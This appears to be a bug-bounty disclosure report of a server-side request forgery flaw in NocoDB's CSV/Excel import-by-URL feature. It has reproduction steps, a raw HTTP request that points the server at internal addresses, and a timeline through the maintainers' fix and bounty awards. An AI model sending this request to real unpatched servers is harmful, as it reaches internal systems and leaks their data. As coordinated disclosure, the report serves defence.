SSRF via Import URL in nocodb/nocodb

Valid

Reported on

Jun 14th 2022


Description

While importing CSV and Excel file via an URL, the server does not validate requests properly that's how the attacker can able to make requests to internal servers and access the contents.

Proof of Concept

  1. Go to any project
  2. From Dashboard, click on Add / Import > CSV or Microsoft Excel > URL
  3. Intercept the proxy and capture the request via Burp Suite and send it to REPEATER tab.
  4. Enter any internal ip addresses. Example: http://127.0.0.1:PORT or http://10.0.0.1
  5. Remove the responseType parameter to "BLANK"
  6. Send
  7. You will receive the contents of the requests.

PoC

POST /api/v1/db/meta/axiosRequestMake HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
xc-gui: true
xc-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImRldkBsb2NhbC5ob3N0IiwiZmlyc3RuYW1lIjpudWxsLCJsYXN0bmFtZSI6bnVsbCwiaWQiOiJ1c184OTJhemRkY2F5cXFvcCIsInJvbGVzIjoiIsInRva2VuX3ZlcnNpb24iOiI0MWU5ZDUwIzYWQ2NjFjZjMzNzUxMmJlZDIwZDllNzliNSIsImlhdCI6MTY1NTE4Mjc2OH0.zE-Z0xoYcmKn1Fp5inqdzmf3gfMXWvl64GbS8ahPpF4
Content-Length: 55
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/dashboard/
Cookie: refresh_token=924112616a665e0baeca68cc4c1b815d23d971f655651fe12669176cfbb28c8babcfda6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"apiMeta":{"url":"http://10.0.0.1","responseType":""}}

Impact

With this SSRF vulnerability, an attacker can reach internal addresses to make a request as the server and read it's contents. This attack can lead to leak of sensitive information.

We are processing your report and will contact the nocodb team within 24 hours. 2 months ago
Aziz Hakim modified the report
2 months ago
We have contacted a member of the nocodb team and are waiting to hear back 2 months ago
We have sent a follow up to the nocodb team. We will try again in 7 days. 2 months ago
nocodb/nocodb maintainer
2 months ago

Maintainer


The changes have been deployed to the below image.

docker run -d -p 8888:8080 nocodb/nocodb-timely:0.91.10-pr-2401-20220617-0750

Expected to be available in the next release.

navi gave praise a month ago
Thank you for the report
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
We have sent a second follow up to the nocodb team. We will try again in 10 days. a month ago
nocodb/nocodb maintainer has acknowledged this report a month ago
nocodb/nocodb maintainer validated this vulnerability a month ago
Aziz Hakim has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
nocodb/nocodb maintainer confirmed that a fix has been merged on 000ecd a month ago
The fix bounty has been dropped
to join this conversation